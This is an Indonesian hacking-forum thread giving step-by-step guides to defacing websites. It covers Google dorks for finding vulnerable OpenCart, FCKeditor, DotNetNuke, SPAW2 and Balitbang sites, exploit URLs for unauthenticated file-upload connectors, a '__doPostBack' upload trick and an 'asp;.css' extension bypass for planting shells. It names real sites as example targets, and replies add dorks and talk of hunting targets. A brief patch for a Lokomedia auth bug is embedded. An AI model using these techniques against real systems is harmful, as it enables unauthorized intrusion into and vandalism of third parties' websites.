|
| | Mendeface Website opencart |  |
|
+5robofics skdcyber RizkyHacks nubitohacker ASSOCK 9 posters | | Pengirim | Message |
|---|
ASSOCK
Top Nubie
Jumlah posting : 40
Points : 118
Reputation : 7
Join date : 07.02.12
|  Subyek: Mendeface Website opencart  Mon Feb 13, 2012 10:24 pm | |
| Ok..Disini Saya Akan Postingkan.. Cara Mendeface Website opencart.. Dan anda Juga Bisa Mencari Bug Nya Di Google.. Cara 1 : Anda Mencari Notepad Untuk Menghedit file deface san HTML anda.. Cara 2 : Beri Nama File Upload Anda [index.htm]Or[index.html] Dan Bisa Juga Index.php Cara 3 : Anda Bisa ambil Di Bawa Deface Upload Yg Anda Ingin Kan. Jika sudah Fix semua .. coba deh upload ke sini [You must be registered and logged in to see this link.]Conector ASP nya di ganti PHP Resource Type dari "None" Rubah ke "File" ntar kalo udah di upload .. coba agan test [You must be registered and logged in to see this link.] file html agan).htm bisa juga deface opencart lain .. dengan dork "Powered by open cart" misal nya dah dapat web target . tinggal tambahain " [You must be registered and logged in to see this link.]selamat mencoba  nih ane nyumbang .. [You must be registered and logged in to see this link.]Kalo berhasil .. mohon share di sini ya  | |
| | | | nubitohacker
NuuBiiTooL
Jumlah posting : 3
Points : 7
Reputation : 0
Join date : 03.01.12
| | Subyek: Re: Mendeface Website opencart Tue Feb 14, 2012 12:28 am | |
| Ane tambahin deh om  - Quote :
Cara 1
- Quote :
- "Deface menggunakan ASPX":
DORK : inurl:Fck/fcklinkgallery.aspxatau /portals/0/
inurl:tabid/176/Default.aspxpilih salah satu dork nya klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspxdi sini ane menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target [URL="http://www.pivocom.com"] [You must be registered and logged in to see this link.] sebagai contohnya.. sehingga akan menjadi seperti ini : [URL="http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"] [You must be registered and logged in to see this link.]setelah nge klik itu, tnggu loading selesai baru kamu harus klik (File A file on your site)dan ganti alamat protocol website nya jadi : javascript:__doPostBack('ctlURL$cmdUpload','' )ntar keluar sendiri tuh, tombol browse ny kya gini.. [You must be registered and logged in to see this image.]klo udah upload file yang pgn kamu masukin,, file yang bisa di upload antara lain: *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, klo gk punya shell nya download aja di sini [URL="http://www.media*fire..com/?72blav74ddvdtea"] [You must be registered and logged in to see this link.]tapi gk smua web yang bisa upload file .html, ada bbrapa situs yg hanya bisa upload file .txt sebelum upload ubah ekstensi nya menjadi css misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css" upload, trus ktia buka hasil deface nya . . kita liat dlu tadi nama file yang kita upload apa misal : "hacker.asp;.css" kita buka alamat protocol nya caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ] nah..abis itu agan ganti alamat "http://www.pivocom.com/ Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi [URL="http://www.pivocom.com/portals/0/"] [You must be registered and logged in to see this link.] intinya kita harus menambahkan " portals/0/" pada akhir [You must be registered and logged in to see this link.]
Cara 2
- Quote :
- "Deface web dengan SPAW Vulnerably":
DORK inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/POC spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9jika sudah menemukan targetnya contoh seperti ini : [URL="http://olgabz.com/spaw2/dialogs/"] [You must be registered and logged in to see this link.]lalu agan ganti spaw2/dialogs/dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9jadinya kya gini [URL="http://olgabz.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da752d9%208cac9"] [You must be registered and logged in to see this link.]nanti akan muncul SPAW File Manager,lihat gambar di bawah ini : [spoiler="penampakan"] [You must be registered and logged in to see this image.]
jangan lupa ganti type nya dari image ke File,dan agan tinggal upload file agan..
jika sudah trus di apain...??
trus agan lihat file kamu sudah masuk blom seperti gambar di bawah ini:
- penampakan":1bd8:
[You must be registered and logged in to see this image.]
lalu bagaimana cara melihat hasil deface kita???
cara nya,agan klick file yg sudah agan upload,nanti akan ada tulisan download file di sebelah kanan,,dan agan klick,,maka hasil file deface agan akan keluar seperti ini..
ni hasilnya [You must be registered and logged in to see this link.]
udah dehh selesai deface nya,,gampang kan ???
- Quote :
- "deface dengan metode opencar":
maaf ini khusus bwt newbie yg ingin blajar,,klo udah om mohon bimbingannya .. seperti biasa nyarinya lewat mbah google dork nya : SUPORT BY OPENCARTatau Powered By OpenCart site:com (site nya bisa anagn ganti,seperti my,il, dll yang penting suport opencart) klo pengen smuanya,site nya ilangin jadi gini aja Powered By OpenCart langsung ke caranya,, jika agan sudah mendapatkan target nya contoh target [URL="http://www.digitalbazzar.co.uk/shop"] [You must be registered and logged in to see this link.] bisa juga [URL=" [You must be registered and logged in to see this link.] dll klo udah dapet targetnya tinggal kita inject exploitnya admin/view/javascript/fckeditor/editor/filemanager/connectors/test.htmljadinya kya gini [URL="http://www.digitalbazzar.co.uk/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html"] [You must be registered and logged in to see this link.]klo ketemu yang kya gini [URL="http://digitalbazzar.co.uk/shop/"] [You must be registered and logged in to see this link.] kamu inject di blakang /shop/ nya.. maka akan muncul tampilan seperti ini.. - penampakan:
[You must be registered and logged in to see this image.]
jangan lupa connectornya di ganti jadi PHP. lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors" untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya... :P jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,, maka hasilnya seperti ini.. [URL="http://www.digitalbazzar.co.uk/"] [You must be registered and logged in to see this link.]
cara 4 - Quote :
- [spoiler="Deface dengan Patch Bug CMS Lokomedia":1bd8]contoh[URL="http://error404.000webhost.com/?"] Lihat[/URL]
DORK=
- inurl:"admin/foto_berita/"
- inurl:"media.php?module="
- allinurl:/media.php?module=berita
pilih salah satu aja ..
path :
/admin/content.php?module=user
PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file /admin/content.php
dengan menambahkan penggalan kode berikut :
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}
Menambahkan penggalan kode yang sama di file /admin/aksi.php
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}
menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan penggalan kode berikut:
if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg"){
echo "Gagal menyimpan data !!!
Tipe file $nama_file : $tipe_file
Tipe file yang diperbolehkan adalah : JPG/JPEG.
";
echo "Ulangi Lagi";
}
else{
.....statement
}
Cara 5
- Quote :
- "Deface CMS Balitbang 3.42":
dorknya: inurl:/html/siswa.php? inurl:/html/alumni.php? inurl:/html/guru.php? Exploit : [You must be registered and logged in to see this link.]pilih salah satu aja ... klo udah milih target masukin exploitnya contoh : Code: [You must be registered and logged in to see this link.]/editor/filemanager/connectors/uploadtest.htmllalu pilih connector nya dari ASP --> PHP,,tinggal masukin filenya agan deh...tapi berbentuk .TXT yah..
| |
| | | | RizkyHacks
NuuBiiTooL
Jumlah posting : 10
Points : 19
Reputation : 1
Join date : 26.03.12
Age : 29
Lokasi : Neraka Kanan
| | Subyek: Re: Mendeface Website opencart Mon Mar 26, 2012 10:23 pm | |
| | |
| | | | skdcyber
Trainee
Jumlah posting : 76
Points : 83
Reputation : 3
Join date : 21.11.11
Lokasi : cikarang
| | Subyek: Re: Mendeface Website opencart Tue Mar 27, 2012 8:36 am | |
| ane ikut juga ah ada lagunya juga,,, xixixixi mkasih kk,,,  [You must be registered and logged in to see this link.] | |
| | | | robofics
VIP Member
Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null
| | Subyek: Re: Mendeface Website opencart Tue Mar 27, 2012 8:42 am | |
| another useful dork - Code:
-
intitle:"FCKeditor" inurl:uploadtest.html | |
| | | | skdcyber
Trainee
Jumlah posting : 76
Points : 83
Reputation : 3
Join date : 21.11.11
Lokasi : cikarang
| | | | | rebel battle
Trainee
Jumlah posting : 96
Points : 101
Reputation : 1
Join date : 30.12.11
| | Subyek: Re: Mendeface Website opencart Tue Mar 27, 2012 10:42 am | |
| | |
| | | | #OPS
Pro Nubie
Jumlah posting : 61
Points : 86
Reputation : 13
Join date : 04.02.12
Age : 35
Lokasi : Lampung City
| | | | | #OPS
Pro Nubie
Jumlah posting : 61
Points : 86
Reputation : 13
Join date : 04.02.12
Age : 35
Lokasi : Lampung City
| | Subyek: Re: Mendeface Website opencart Tue Mar 27, 2012 2:56 pm | |
| | |
| | | | robofics
VIP Member
Jumlah posting : 709
Points : 804
Reputation : 20
Join date : 22.12.11
Lokasi : /dev/null
| | | | | BumiayuKita
Administrator
Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu
| | Subyek: Re: Mendeface Website opencart Wed Mar 28, 2012 11:37 pm | |
| | |
| | | | ahsanovic
NuuBiiTooL
Jumlah posting : 10
Points : 10
Reputation : 0
Join date : 14.03.12
| | Subyek: Re: Mendeface Website opencart Thu Nov 08, 2012 12:40 pm | |
| cari target ah  | |
| | | | Sponsored content
| | Subyek: Re: Mendeface Website opencart | |
| |
| | | | | | Mendeface Website opencart | |
|
Similar topics | |
|
| | Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| | Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
| Statistics | Total 12294 user terdaftar
User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
| Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
| Social Networking | 
|
|
